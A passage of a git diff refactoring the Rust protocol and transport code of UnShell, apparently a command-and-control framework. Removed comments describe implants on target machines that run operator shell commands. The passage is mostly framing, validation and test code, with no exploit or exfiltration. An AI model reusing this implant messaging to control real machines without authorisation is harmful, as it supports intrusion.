+fn align_section(bytes: &[u8]) -> AlignedVec { + let mut aligned = AlignedVec::with_capacity(bytes.len()); + aligned.extend_from_slice(bytes); + aligned +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::protocol::{HookTarget, PacketType}; + use alloc::{string::String, vec}; + + #[test] + fn framing_roundtrip_preserves_call() { + let header = PacketHeader { + packet_type: PacketType::Call, + src_path: Vec::new(), + dst_path: vec![String::from("child")], + dst_leaf: Some(String::from("echo")), + hook_id: None, + }; + let call = CallMessage { + procedure_id: String::from("org.product.v1.echo.roundtrip"), + data: b"ping".to_vec(), + response_hook: Some(HookTarget { + hook_id: 1, + return_path: Vec::new(), + }), + }; + + let frame = encode_packet(&header, &call).expect("frame should encode"); + let parsed = decode_frame(&frame).expect("frame should decode"); + assert_eq!(parsed.deserialize_header(), header); + assert_eq!(parsed.deserialize_call().expect("call should decode"), call); + } +} diff --git a/src/protocol/content.rs b/src/protocol/content.rs deleted file mode 100644 index a19ee87..0000000 --- a/src/protocol/content.rs +++ /dev/null @@ -1,59 +0,0 @@ -//! # Content Type Constants -//! -//! Content types describe how to interpret the `data` field of a -//! [`TreeRequest`](super::TreeRequest) or [`TreeResponse`](super::TreeResponse). -//! -//! They follow a `"namespace/TypeName"` convention, similar to MIME types. -//! -//! ## Built-in types -//! -//! | Constant | Value | Meaning | -//! |---|---|---| -//! | [`NONE`] | `"core/None"` | No data (empty payload) | -//! | [`UTF8_STRING`] | `"core/Utf8String"` | Raw UTF-8 string | -//! | [`BYTES`] | `"core/Bytes"` | Raw bytes (no specific interpretation) | -//! | [`PROCEDURE_LIST`] | `"core/ProcedureList"` | rkyv-serialised `Vec` | -//! -//! ## Custom types -//! -//! Module authors should prefix with their module name: -//! -//! ```rust -//! const MY_TYPE: &str = "mymodule/MyType"; -//! ``` - -/// No data. Use for requests/responses that carry no payload. -/// -/// # Example -/// -/// ```rust -/// use unshell::protocol::{TreeRequest, RequestType, content}; -/// -/// // A ping-style read with no payload -/// let req = TreeRequest { -/// request_id: 1, -/// request_type: RequestType::Read, -/// content_type: content::NONE.into(), -/// data: Vec::new(), -/// }; -/// ``` -pub const NONE: &str = "core/None"; - -/// A raw UTF-8 string. -/// -/// The `data` field contains the string's bytes (no null terminator, no length prefix). -pub const UTF8_STRING: &str = "core/Utf8String"; - -/// Raw bytes with no specific interpretation. -pub const BYTES: &str = "core/Bytes"; - -/// A rkyv-serialised `Vec`. -/// -/// Used in responses to [`RequestType::GetProcedures`](super::RequestType::GetProcedures). -pub const PROCEDURE_LIST: &str = "core/ProcedureList"; - -/// Shell command output: UTF-8 stdout and stderr combined. -pub const SHELL_OUTPUT: &str = "shell/Output"; - -/// Raw file contents as bytes. -pub const FILE_BYTES: &str = "files/Bytes"; diff --git a/src/protocol/introspection.rs b/src/protocol/introspection.rs new file mode 100644 index 0000000..e2b34e1 --- /dev/null +++ b/src/protocol/introspection.rs @@ -0,0 +1,32 @@ +//! Required introspection payloads. + +use alloc::{string::String, vec::Vec}; +use rkyv::{Archive, Deserialize, Serialize}; + +/// Reserved procedure id for protocol introspection. +pub const INTROSPECTION_PROCEDURE_ID: &str = ""; + +/// Endpoint-wide introspection payload. +#[derive(Archive, Serialize, Deserialize, Debug, Clone, PartialEq, Eq)] +pub struct EndpointIntrospection { + /// Hosted leaves and their supported procedures. + pub leaves: Vec, +} + +/// Shared per-leaf discovery record. +#[derive(Archive, Serialize, Deserialize, Debug, Clone, PartialEq, Eq)] +pub struct LeafIntrospectionSummary { + /// Local leaf name. + pub leaf_name: String, + /// Canonical procedure identifiers supported by the leaf. + pub procedures: Vec, +} + +/// Leaf-specific introspection payload. +#[derive(Archive, Serialize, Deserialize, Debug, Clone, PartialEq, Eq)] +pub struct LeafIntrospection { + /// Local leaf name. + pub leaf_name: String, + /// Canonical procedure identifiers supported by the leaf. + pub procedures: Vec, +} diff --git a/src/protocol/mod.rs b/src/protocol/mod.rs index 5762606..5cbc603 100644 --- a/src/protocol/mod.rs +++ b/src/protocol/mod.rs @@ -1,40 +1,17 @@ -//! # Protocol Module +//! Canonical UnShell protocol modules. //! -//! All wire types used by the UnShell protocol. -//! -//! ## Module layout -//! -//! ```text -//! protocol/ -//! mod.rs ← you are here; re-exports everything -//! types.rs ← PacketHeader, TreeRequest, TreeResponse, Handshake* -//! content.rs ← content-type string constants -//! ``` -//! -//! ## Quick start -//! -//! ```rust -//! use unshell::protocol::{ -//! PacketHeader, PacketType, -//! TreeRequest, RequestType, -//! content, -//! }; -//! -//! let header = PacketHeader { -//! dst_path: "/agents/abc123/shell/exec".into(), -//! src_path: "/operator/sess1".into(), -//! packet_type: PacketType::Request, -//! }; -//! -//! let request = TreeRequest { -//! request_id: 1, -//! request_type: RequestType::CallProcedure, -//! content_type: content::UTF8_STRING.into(), -//! data: b"ls -la".to_vec(), -//! }; -//! ``` +//! The wire model matches `PROTOCOL.md` directly. -pub mod content; +pub mod codec; +pub mod introspection; mod types; +pub mod validation; -pub use types::*; +pub use codec::{ + FrameBytes, FrameError, ParsedFrame, decode_frame, deserialize_archived_bytes, encode_packet, +}; +pub use introspection::{EndpointIntrospection, LeafIntrospection, LeafIntrospectionSummary}; +pub use types::{ + CallMessage, DataMessage, FaultMessage, HookTarget, PacketHeader, PacketType, ProtocolFault, +}; +pub use validation::{ValidationError, validate_call, validate_header, validate_procedure_id}; diff --git a/src/protocol/types.rs b/src/protocol/types.rs index ec8d380..82cbe33 100644 --- a/src/protocol/types.rs +++ b/src/protocol/types.rs @@ -1,314 +1,85 @@ -//! # Protocol Wire Types -//! -//! All structs and enums that appear on the wire. -//! -//! ## Serialisation -//! -//! Every type here derives rkyv's `Archive`, `Serialize`, and `Deserialize`. -//! This means they can be serialised to a byte slice and deserialised back -//! with zero copying — the deserialised view (`Archived`) reads directly -//! from the byte slice without allocating. -//! -//! ## Wire Frame Format -//! -//! Every packet on the wire uses a two-part frame: -//! -//! ```text -//! ┌──────────────────────────────────────────────────────────────────────┐ -//! │ Part 1: Header │ Part 2: Payload │ -//! │ [u32 big-endian length] │ [u32 big-endian length] │ -//! │ [rkyv-serialised PacketHeader bytes] │ [rkyv payload bytes] │ -//! └──────────────────────────────────────────┴───────────────────────────┘ -//! ``` -//! -//! The router reads only Part 1 to determine where to route the packet. -//! Part 2 is forwarded opaque (the router does not deserialise it). +//! Archived protocol message types. -use alloc::string::String; -use alloc::vec::Vec; +use alloc::{string::String, vec::Vec}; use rkyv::{Archive, Deserialize, Serialize}; -// --------------------------------------------------------------------------- -// PacketHeader -// --------------------------------------------------------------------------- - -/// The header prefixed to every packet on the wire. -/// -/// The router reads ONLY this field to determine routing. -/// The payload body is opaque to the router. -/// -/// # Example -/// -/// ```rust -/// use unshell::protocol::{PacketHeader, PacketType}; -/// -/// let header = PacketHeader { -/// dst_path: "/agents/abc123/shell/exec".into(), -/// src_path: "/operator/sess1".into(), -/// packet_type: PacketType::Request, -/// }; -/// ``` -#[derive(Archive, Serialize, Deserialize, Debug, Clone)] -#[rkyv(derive(Debug))] -pub struct PacketHeader { - /// Destination path in the global tree. - /// - /// The router does a longest-prefix match against registered node paths. - /// Example: `"/agents/abc123/shell/exec"`. - pub dst_path: String, - - /// Source path of the sending node. - /// - /// Used by the destination to route the response back. - /// Example: `"/operator/sess1"`. - pub src_path: String, - - /// Discriminates between handshake messages and protocol messages. - pub packet_type: PacketType, -} - -/// Discriminates the payload type. -/// -/// The receiver uses this to know which type to deserialise the payload as. -#[derive(Archive, Serialize, Deserialize, Debug, Clone, PartialEq, Eq)] -#[rkyv(derive(Debug, PartialEq))] +/// The three protocol packet types. +#[repr(u8)] +#[derive(Archive, Serialize, Deserialize, Debug, Clone, Copy, PartialEq, Eq)] pub enum PacketType { - /// Sent by a newly-connected node to register with the router. - Handshake, - /// Sent by the router acknowledging (or rejecting) a handshake. - HandshakeAck, - /// An application-level request (the primary protocol message). - Request, - /// An application-level response. - Response, + /// Downwards procedure invocation. + Call = 0x01, + /// Returned or continuing hook traffic. + Data = 0x02, + /// Upstream protocol failure tied to a hook. + Fault = 0xFF, } -// --------------------------------------------------------------------------- -// Handshake -// --------------------------------------------------------------------------- - -/// Sent by a node immediately after connecting to the router. -/// -/// The router reads this to register the node in its routing table. -/// -/// # Wire format -/// -/// This struct is the payload part of a frame whose header has -/// `packet_type = PacketType::Handshake`. The `dst_path` in the header is -/// `"/router"` (the router's own registration endpoint). -/// -/// # Example -/// -/// ```rust -/// use unshell::protocol::{HandshakeMessage, NodeType}; -/// -/// let msg = HandshakeMessage { -/// node_id: "abc123".into(), -/// node_type: NodeType::Payload, -/// registered_paths: vec!["/agents/abc123".into()], -/// platform: "linux-x86_64".into(), -/// }; -/// ``` -#[derive(Archive, Serialize, Deserialize, Debug, Clone)] -#[rkyv(derive(Debug))] -pub struct HandshakeMessage { - /// Node identifier. - /// - /// For payloads: a base62 string baked at compile time. - /// For operator sessions: a random string generated on startup. - pub node_id: String, - - /// Whether this node is a payload or an operator shell. - pub node_type: NodeType, - - /// The path prefixes this node claims ownership of. - /// - /// All sub-paths under these prefixes are owned by this node. - /// The router uses these for longest-prefix route matching. - /// - /// Example: `["/agents/abc123"]` - pub registered_paths: Vec, - - /// Human-readable platform identifier for operator visibility. - /// - /// Example: `"linux-x86_64"`, `"windows-x86_64"`, `"operator"`. - pub platform: String, -} - -/// Sent by the router in response to a `HandshakeMessage`. -/// -/// # Example -/// -/// ```rust -/// use unshell::protocol::HandshakeAck; -/// -/// // Successful registration -/// let ack = HandshakeAck { -/// accepted: true, -/// assigned_base_path: "/agents/abc123".into(), -/// rejection_reason: None, -/// }; -/// -/// // Rejection (duplicate node ID) -/// let nack = HandshakeAck { -/// accepted: false, -/// assigned_base_path: String::new(), -/// rejection_reason: Some("duplicate_node_id".into()), -/// }; -/// ``` -#[derive(Archive, Serialize, Deserialize, Debug, Clone)] -#[rkyv(derive(Debug))] -pub struct HandshakeAck { - /// Whether the router accepted the registration. - pub accepted: bool, - - /// The canonical base path assigned by the router. - /// - /// Typically matches the first entry in `HandshakeMessage::registered_paths`. - /// Empty string if `accepted == false`. - pub assigned_base_path: String, - - /// Human-readable rejection reason when `accepted == false`. - /// - /// Known values: `"duplicate_node_id"`, `"invalid_path"`. - pub rejection_reason: Option, -} - -/// The type of node connecting to the router. -/// -/// The `Router` variant is reserved for future multi-hop/pivoting support -/// and is not used in v1. +/// Header fields used for routing and hook attribution. #[derive(Archive, Serialize, Deserialize, Debug, Clone, PartialEq, Eq)] -#[rkyv(derive(Debug, PartialEq))] -pub enum NodeType { - /// An implant running on a target machine. - Payload, - /// An operator's interactive shell session. - Operator, - // Router variant will be added when multi-hop/pivoting is implemented. - // Router, +pub struct PacketHeader { + /// Packet semantics discriminator. + pub packet_type: PacketType, + /// Sending endpoint path. + pub src_path: Vec, + /// Destination endpoint path. + pub dst_path: Vec, + /// Optional target leaf for calls. + pub dst_leaf: Option, + /// Optional hook identifier for `Data` and `Fault` packets. + pub hook_id: Option, } -// --------------------------------------------------------------------------- -// TreeRequest / TreeResponse -// --------------------------------------------------------------------------- +/// Hook declaration embedded inside a call. +#[derive(Archive, Serialize, Deserialize, Debug, Clone, PartialEq, Eq)] +pub struct HookTarget { + /// Hook identifier scoped to `return_path`. + pub hook_id: u64, + /// Path of the endpoint that hosts the hook. + pub return_path: Vec, +} -/// An application-level request sent from an operator to a payload module. -/// -/// The request travels: operator → router → destination node. -/// -/// # Example -/// -/// ```rust -/// use unshell::protocol::{TreeRequest, RequestType, content}; -/// -/// // Ask a shell module to execute a command -/// let req = TreeRequest { -/// request_id: 42, -/// request_type: RequestType::CallProcedure, -/// content_type: content::UTF8_STRING.into(), -/// data: b"ls -la /tmp".to_vec(), -/// }; -/// ``` -#[derive(Archive, Serialize, Deserialize, Debug, Clone)] -#[rkyv(derive(Debug))] -pub struct TreeRequest { - /// Unique request ID generated by the sender. - /// - /// The responder echoes this back in [`TreeResponse::request_id`]. - /// This allows the sender to match responses to outstanding requests, - /// which matters when multiple requests are in-flight concurrently - /// (e.g., background sessions in the operator CLI). - pub request_id: u64, - - /// The operation type. - pub request_type: RequestType, - - /// Content-type describing how to interpret [`data`](Self::data). - /// - /// Use the constants in [`content`](super::content) for the built-in types. - /// Custom module types should use the module name as namespace: - /// `"mymodule/MyType"`. - pub content_type: String, - - /// Operation payload. Interpretation depends on `content_type`. +/// Downwards call payload. +#[derive(Archive, Serialize, Deserialize, Debug, Clone, PartialEq, Eq)] +pub struct CallMessage { + /// Canonical procedure contract identifier. + pub procedure_id: String, + /// Opaque application bytes. pub data: Vec, + /// Optional response hook declaration. + pub response_hook: Option, } -/// The type of operation being requested. +/// Hook data payload. #[derive(Archive, Serialize, Deserialize, Debug, Clone, PartialEq, Eq)] -#[rkyv(derive(Debug, PartialEq))] -pub enum RequestType { - /// Read a value at the target path. - Read = 0, - /// List available sub-paths and callable procedures at the target path. - GetProcedures = 1, - /// Write a value to the target path. - Write = 2, - /// Invoke a named procedure at the target path. - CallProcedure = 3, -} - -/// An application-level response from a payload module back to the operator. -/// -/// The response travels: payload → router → requesting operator. -/// -/// # Example -/// -/// ```rust -/// use unshell::protocol::{TreeResponse, ResponseStatus, content}; -/// -/// let resp = TreeResponse { -/// request_id: 42, // echoed from the corresponding TreeRequest -/// status: ResponseStatus::Ok, -/// content_type: content::UTF8_STRING.into(), -/// data: b"file1.txt\nfile2.txt\n".to_vec(), -/// }; -/// ``` -#[derive(Archive, Serialize, Deserialize, Debug, Clone)] -#[rkyv(derive(Debug))] -pub struct TreeResponse { - /// Echoed from the corresponding [`TreeRequest::request_id`]. - pub request_id: u64, - - /// Whether the operation succeeded. - pub status: ResponseStatus, - - /// Content-type of the response data. - pub content_type: String, - - /// Response payload. Empty if `status` is an error variant. +pub struct DataMessage { + /// Procedure contract anchored to the originating call. + pub procedure_id: String, + /// Opaque application bytes. pub data: Vec, + /// Indicates that this sender is done with the hook. + pub end_hook: bool, } -/// Indicates the outcome of a [`TreeRequest`]. +/// Protocol fault payload. #[derive(Archive, Serialize, Deserialize, Debug, Clone, PartialEq, Eq)] -#[rkyv(derive(Debug, PartialEq))] -pub enum ResponseStatus { - /// The operation completed successfully. - Ok = 0, - /// The requested path does not exist at the destination node. - NoBranchError = 1, - /// The requested operation is not supported at this path. - UnsupportedOperation = 2, - /// The destination node encountered an internal error. - ExecutionError = 3, - /// The request payload was malformed or could not be deserialised. - ProtocolError = 4, +pub struct FaultMessage { + /// Fixed protocol fault value. + pub fault: ProtocolFault, } -/// A descriptor for a callable procedure, returned by [`RequestType::GetProcedures`]. -/// -/// This is what fills the `data` field of a `TreeResponse` when the -/// request type is `GetProcedures` and `content_type` is `content::PROCEDURE_LIST`. -#[derive(Archive, Serialize, Deserialize, Debug, Clone)] -#[rkyv(derive(Debug))] -pub struct ProcedureDescriptor { - /// The name of the procedure (the path component after the module path). - /// - /// Example: `"exec"` for the module at `/agents/abc123/shell/exec`. - pub name: String, - - /// Human-readable description of what this procedure does. - pub description: String, +/// Stable protocol fault set. +#[repr(u8)] +#[derive(Archive, Serialize, Deserialize, Debug, Clone, Copy, PartialEq, Eq)] +pub enum ProtocolFault { + /// The destination leaf does not exist. + UnknownLeaf = 0x01, + /// The destination does not support the requested procedure. + UnknownProcedure = 0x02, + /// The source path was invalid for the receiving connection. + InvalidSourcePath = 0x03, + /// The sender did not match the expected hook peer. + InvalidHookPeer = 0x04, + /// The endpoint encountered an internal processing failure. + InternalError = 0x05, } diff --git a/src/protocol/validation.rs b/src/protocol/validation.rs new file mode 100644 index 0000000..ebae7c3 --- /dev/null +++ b/src/protocol/validation.rs @@ -0,0 +1,189 @@ +//! Stateless protocol validation. + +use core::fmt; + +use crate::protocol::{ + CallMessage, PacketHeader, PacketType, introspection::INTROSPECTION_PROCEDURE_ID, +}; + +/// Validation failures for protocol structures. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum ValidationError { + /// Header invariants were violated. + HeaderInvariant(&'static str), + /// The canonical procedure identifier was invalid. + ProcedureId(&'static str), + /// Call-specific invariants were violated. + CallInvariant(&'static str), +} + +impl fmt::Display for ValidationError { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::HeaderInvariant(message) => write!(f, "invalid header: {message}"), + Self::ProcedureId(message) => write!(f, "invalid procedure id: {message}"), + Self::CallInvariant(message) => write!(f, "invalid call: {message}"), + } + } +} + +#[cfg(feature = "std")] +impl std::error::Error for ValidationError {} + +/// Validates packet header invariants from the protocol. +/// +/// # Errors +/// +/// Returns [`ValidationError`] when the header shape does not match the packet type. +pub fn validate_header(header: &PacketHeader) -> Result<(), ValidationError> { + match header.packet_type { + PacketType::Call => { + if header.hook_id.is_some() { + return Err(ValidationError::HeaderInvariant( + "Call packets must not carry hook_id", + )); + } + } + PacketType::Data | PacketType::Fault => { + if header.dst_leaf.is_some() { + return Err(ValidationError::HeaderInvariant( + "Data and Fault packets must not carry dst_leaf", + )); + } + if header.hook_id.is_none() { + return Err(ValidationError::HeaderInvariant( + "Data and Fault packets must carry hook_id", + )); + } + } + } + + Ok(()) +} + +/// Validates the canonical dotted `procedure_id` shape. +/// +/// # Errors +/// +/// Returns [`ValidationError`] when the procedure id does not match the required format. +pub fn validate_procedure_id(procedure_id: &str) -> Result<(), ValidationError> { + if procedure_id == INTROSPECTION_PROCEDURE_ID { + return Ok(()); + } + + let mut segments = procedure_id.split('.'); + let mut collected = [""; 5]; + for (index, slot) in collected.iter_mut().enumerate() { + let Some(segment) = segments.next() else { + return Err(ValidationError::ProcedureId( + "must contain exactly 5 segments", + )); + }; + if segment.is_empty() { + return Err(ValidationError::ProcedureId("segments must be non-empty")); + } + *slot = segment; + if index != 2 && !segment.chars().all(is_portable_procedure_char) { + return Err(ValidationError::ProcedureId( + "segments should use lowercase ASCII, digits, and underscores", + )); + } + } + + if segments.next().is_some() { + return Err(ValidationError::ProcedureId( + "must contain exactly 5 segments", + )); + } + + let version = collected[2]; + let Some(suffix) = version.strip_prefix('v') else { + return Err(ValidationError::ProcedureId( + "third segment must be a version like v1", + )); + }; + + if suffix.is_empty() || suffix.starts_with('0') || !suffix.chars().all(|ch| ch.is_ascii_digit()) + { + return Err(ValidationError::ProcedureId( + "version segment must be v followed by a positive decimal integer", + )); + } + + Ok(()) +} + +/// Validates call-specific invariants that depend on both header and payload. +/// +/// # Errors +/// +/// Returns [`ValidationError`] when the call payload conflicts with the header. +pub fn validate_call(header: &PacketHeader, call: &CallMessage) -> Result<(), ValidationError> { + validate_procedure_id(&call.procedure_id)?; + + if let Some(hook) = &call.response_hook + && hook.return_path != header.src_path + { + return Err(ValidationError::CallInvariant( + "response_hook.return_path must equal header.src_path", + )); + } + + if call.procedure_id == INTROSPECTION_PROCEDURE_ID && call.response_hook.is_none() { + return Err(ValidationError::CallInvariant( + "introspection requires a response hook", + )); + } + + Ok(()) +} + +fn is_portable_procedure_char(ch: char) -> bool { + ch.is_ascii_lowercase() || ch.is_ascii_digit() || ch == '_' +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::protocol::{HookTarget, PacketType}; + use alloc::{string::String, vec}; + + #[test] + fn rejects_invalid_data_header() { + let header = PacketHeader { + packet_type: PacketType::Data, + src_path: Vec::new(), + dst_path: Vec::new(), + dst_leaf: Some(String::from("leaf")), + hook_id: None, + }; + assert!(validate_header(&header).is_err()); + } + + #[test] + fn validates_procedure_id_shape() { + assert!(validate_procedure_id("org.product.v1.demo.echo").is_ok()); + assert!(validate_procedure_id("org.product.v01.demo.echo").is_err()); + assert!(validate_procedure_id("Org.product.v1.demo.echo").is_err()); + } + + #[test] + fn validates_response_hook_return_path() { + let header = PacketHeader { + packet_type: PacketType::Call, + src_path: vec![String::from("src")], + dst_path: vec![String::from("dst")], + dst_leaf: None, + hook_id: None, + }; + let call = CallMessage { + procedure_id: String::from("org.product.v1.demo.echo"), + data: Vec::new(), + response_hook: Some(HookTarget { + hook_id: 1, + return_path: vec![String::from("other")], + }), + }; + assert!(validate_call(&header, &call).is_err()); + } +} diff --git a/src/transport/channel.rs b/src/transport/channel.rs new file mode 100644 index 0000000..5693778 --- /dev/null +++ b/src/transport/channel.rs @@ -0,0 +1,77 @@ +//! Simulated transport built on `crossbeam-channel`. + +use crossbeam_channel::{Receiver, Sender, unbounded}; + +use crate::{ + protocol::FrameBytes, + transport::{Transport, TransportError}, +}; + +/// One endpoint of a simulated duplex transport. +#[derive(Debug, Clone)] +pub struct ChannelTransport { + sender: Sender, + receiver: Receiver, +} + +impl ChannelTransport { + /// Builds a connected pair of transports. + pub fn pair() -> (Self, Self) { + let (ab_tx, ab_rx) = unbounded(); + let (ba_tx, ba_rx) = unbounded(); + ( + Self { + sender: ab_tx, + receiver: ba_rx, + }, + Self { + sender: ba_tx, + receiver: ab_rx, + }, + ) + } +} + +impl Transport for ChannelTransport { + fn send_frame(&mut self, frame: FrameBytes) -> Result<(), TransportError> { + self.sender + .send(frame) + .map_err(|_| TransportError::ChannelClosed) + } + + fn recv_frame(&mut self) -> Result { + self.receiver + .recv() + .map_err(|_| TransportError::ChannelClosed) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::protocol::{DataMessage, PacketHeader, PacketType, decode_frame, encode_packet}; + use alloc::{string::String, vec}; + + #[test] + fn channel_roundtrip_moves_framed_bytes() { + let (mut left, mut right) = ChannelTransport::pair(); + let header = PacketHeader { + packet_type: PacketType::Data, + src_path: vec![String::from("a")], + dst_path: vec![String::from("b")], + dst_leaf: None, + hook_id: Some(7), + }; + let data = DataMessage { + procedure_id: String::from("org.product.v1.echo.roundtrip"), + data: b"payload".to_vec(), + end_hook: true, + }; + let frame = encode_packet(&header, &data).expect("frame should encode"); + + left.send_frame(frame).expect("send should succeed"); + let received = right.recv_frame().expect("recv should succeed"); + let parsed = decode_frame(&received).expect("received frame should decode"); + assert_eq!(parsed.deserialize_data().expect("data should decode"), data); + } +} diff --git a/src/transport/mod.rs b/src/transport/mod.rs index c8b094a..cc159b4 100644 --- a/src/transport/mod.rs +++ b/src/transport/mod.rs @@ -1,304 +1,79 @@ -//! # Transport Module +//! Framed transport implementations. //! -//! The transport layer abstracts the network connection used to carry protocol packets. -//! -//! ## Module layout -//! -//! ```text -//! transport/ -//! mod.rs ← you are here; Transport trait, TransportError, frame encoding -//! tcp.rs ← TcpTransport: Transport implemented for std::net::TcpStream -//! ``` -//! -//! ## Design -//! -//! A `Transport` sends and receives complete logical packets. Each packet is -//! one `PacketHeader` + one opaque payload byte slice. -//! -//! Internally, implementations must use the two-part framing format: -//! -//! ```text -//! ┌──────────────────────────────────────────────────────────────────────┐ -//! │ [u32 big-endian header_len][header bytes][u32 big-endian pay_len] │ -//! │ [payload bytes] │ -//! └──────────────────────────────────────────────────────────────────────┘ -//! ``` -//! -//! **IMPORTANT:** TCP is a stream protocol. A single `read()` call may return -//! fewer bytes than requested. All receive operations MUST loop until the -//! exact number of bytes has been read. The standard pattern is `read_exact()`. -//! -//! ## Size limits -//! -//! | Limit | Value | Reason | -//! |---|---|---| -//! | Max header bytes | 64 KB | Headers are always small; larger = bug or attack | -//! | Max payload bytes | 64 MB | Sufficient for most file transfers | -//! -//! ## Transport implementations -//! -//! | Type | Where | Description | -//! |---|---|---| -//! | [`tcp::TcpTransport`] | `transport/tcp.rs` | Standard TCP socket | -//! -//! Future additions: `HttpsTransport`, `IcmpTransport`, `OpenVpnTransport`. +//! Transports move complete framed packets represented by [`crate::protocol::FrameBytes`]. +//! Packet parsing and validation live above this layer. -extern crate alloc; -use alloc::vec::Vec; -#[allow(unused_imports)] -use alloc::vec; +use crate::protocol::FrameBytes; -use crate::protocol::PacketHeader; - -/// TCP transport implementation. -/// -/// Only available when the `tcp` feature is enabled (requires `std`). -/// Enable with `unshell = { features = ["tcp"] }` in your `Cargo.toml`. +#[cfg(feature = "sim")] +pub mod channel; #[cfg(feature = "tcp")] pub mod tcp; -// --------------------------------------------------------------------------- -// Frame size limits -// --------------------------------------------------------------------------- - -/// Maximum allowed size for a serialised `PacketHeader` (64 KB). -/// -/// Headers should be tiny (< 200 bytes in practice). Anything larger suggests -/// either a bug in the sender or a malformed/malicious frame. +/// Maximum allowed size for a serialized header section. pub const MAX_HEADER_BYTES: usize = 64 * 1024; -/// Maximum allowed size for a packet payload (64 MB). -/// -/// Sufficient for most file transfers without chunking. -/// Larger transfers will require the (not-yet-implemented) streaming extension. +/// Maximum allowed size for a serialized payload section. pub const MAX_PAYLOAD_BYTES: usize = 64 * 1024 * 1024; -// --------------------------------------------------------------------------- -// TransportError -// --------------------------------------------------------------------------- - -/// Errors that can occur during [`Transport`] operations. -/// -/// # Reconnect policy -/// -/// When a payload receives [`TransportError::Disconnected`] or -/// [`TransportError::Io`], it should: -/// 1. Close the current transport. -/// 2. Wait 5 seconds. -/// 3. Attempt to create a new transport connection. -/// 4. Repeat indefinitely on failure. -/// -/// The operator CLI exits on disconnect (the user restarts it manually). +/// Transport-layer failure. #[derive(Debug)] pub enum TransportError { - /// An I/O error from the underlying stream. - /// - /// This includes partial writes, socket errors, and OS-level failures. - /// Only available when the `tcp` feature is enabled (requires std). + /// The peer disconnected cleanly. + Disconnected, + /// The announced header length exceeded the limit. + HeaderTooLarge(usize, usize), + /// The announced payload length exceeded the limit. + PayloadTooLarge(usize, usize), + /// Underlying I/O failure. #[cfg(feature = "tcp")] Io(std::io::Error), - - /// The announced frame header length exceeds [`MAX_HEADER_BYTES`]. - /// - /// The connection should be closed immediately — the remote end is either - /// buggy or malicious. Do not allocate a buffer of the announced size. - /// - /// Fields: `(announced_size, limit)`. - HeaderTooLarge(usize, usize), - - /// The announced frame payload length exceeds [`MAX_PAYLOAD_BYTES`]. - /// - /// Fields: `(announced_size, limit)`. - PayloadTooLarge(usize, usize), - - /// The remote end closed the connection cleanly (EOF). - /// - /// This is not an error in the traditional sense. It means the other side - /// disconnected intentionally (e.g., payload restarted, operator exited). - Disconnected, - - /// The received bytes could not be deserialised as a `PacketHeader`. - /// - /// This indicates a protocol version mismatch or data corruption. - DeserialiseError, + /// Channel send or receive failure. + #[cfg(feature = "sim")] + ChannelClosed, } -#[cfg(feature = "tcp")] impl core::fmt::Display for TransportError { fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { match self { - Self::Io(e) => write!(f, "transport I/O error: {e}"), + Self::Disconnected => f.write_str("transport disconnected"), Self::HeaderTooLarge(got, max) => { - write!(f, "frame header too large: {got} bytes (limit: {max})") + write!(f, "header too large: {got} bytes (limit {max})") } Self::PayloadTooLarge(got, max) => { - write!(f, "frame payload too large: {got} bytes (limit: {max})") + write!(f, "payload too large: {got} bytes (limit {max})") } - Self::Disconnected => write!(f, "connection closed by remote"), - Self::DeserialiseError => write!(f, "failed to deserialise packet header"), + #[cfg(feature = "tcp")] + Self::Io(error) => write!(f, "transport I/O error: {error}"), + #[cfg(feature = "sim")] + Self::ChannelClosed => f.write_str("channel transport closed"), } } } -#[cfg(not(feature = "tcp"))] -impl core::fmt::Display for TransportError { - fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { - match self { - Self::HeaderTooLarge(got, max) => { - write!(f, "frame header too large: {got} bytes (limit: {max})") - } - Self::PayloadTooLarge(got, max) => { - write!(f, "frame payload too large: {got} bytes (limit: {max})") - } - Self::Disconnected => write!(f, "connection closed by remote"), - Self::DeserialiseError => write!(f, "failed to deserialise packet header"), - } - } -} +#[cfg(feature = "std")] +impl std::error::Error for TransportError {} #[cfg(feature = "tcp")] impl From for TransportError { - fn from(e: std::io::Error) -> Self { - Self::Io(e) + fn from(value: std::io::Error) -> Self { + Self::Io(value) } } -// Implement std::error::Error so TransportError works with `?` in Box contexts. -#[cfg(feature = "tcp")] -impl std::error::Error for TransportError { - fn source(&self) -> Option<&(dyn std::error::Error + 'static)> { - match self { - Self::Io(e) => Some(e), - _ => None, - } - } -} - -// --------------------------------------------------------------------------- -// Transport trait -// --------------------------------------------------------------------------- - -/// A bidirectional framed transport. -/// -/// Implementors handle the low-level byte transfer, including framing, -/// length prefixes, and the `read_exact` loop. The protocol layer above -/// sees complete logical packets (header + payload pairs). -/// -/// # Contract -/// -/// - `send` must write all bytes before returning `Ok(())`. -/// - `recv` must block until a complete header+payload pair is available. -/// - Both methods must use `read_exact`-style loops (never a single `read`). -/// - Frame size checks must be performed before any allocation. -/// -/// # Example: implementing a custom transport -/// -/// ```rust,no_run -/// use unshell::transport::{Transport, TransportError}; -/// use unshell::protocol::PacketHeader; -/// -/// struct MyTransport { /* ... */ } -/// -/// impl Transport for MyTransport { -/// fn send(&mut self, header: &PacketHeader, payload: &[u8]) -/// -> Result<(), TransportError> -/// { -/// // 1. Serialise header with rkyv -/// // 2. Write [u32 header_len][header bytes][u32 payload_len][payload bytes] -/// // 3. Use write_all() — never plain write() -/// todo!() -/// } -/// -/// fn recv(&mut self) -> Result<(PacketHeader, Vec), TransportError> { -/// // 1. read_exact 4 bytes → header_len -/// // 2. Check header_len <= MAX_HEADER_BYTES before allocating -/// // 3. read_exact header_len bytes -/// // 4. Deserialise header -/// // 5. read_exact 4 bytes → payload_len -/// // 6. Check payload_len <= MAX_PAYLOAD_BYTES before allocating -/// // 7. read_exact payload_len bytes -/// // 8. Return (header, payload) -/// todo!() -/// } -/// } -/// -/// // SAFETY: MyTransport owns its stream exclusively and does not share it. -/// unsafe impl Send for MyTransport {} -/// ``` +/// Duplex framed transport. pub trait Transport: Send { - /// Send one complete packet over this transport. - /// - /// Blocks until all bytes have been written. + /// Sends one complete framed packet. /// /// # Errors /// - /// Returns [`TransportError::Io`] if the write fails partway through, - /// or [`TransportError::Disconnected`] if the remote end is closed. - fn send(&mut self, header: &PacketHeader, payload: 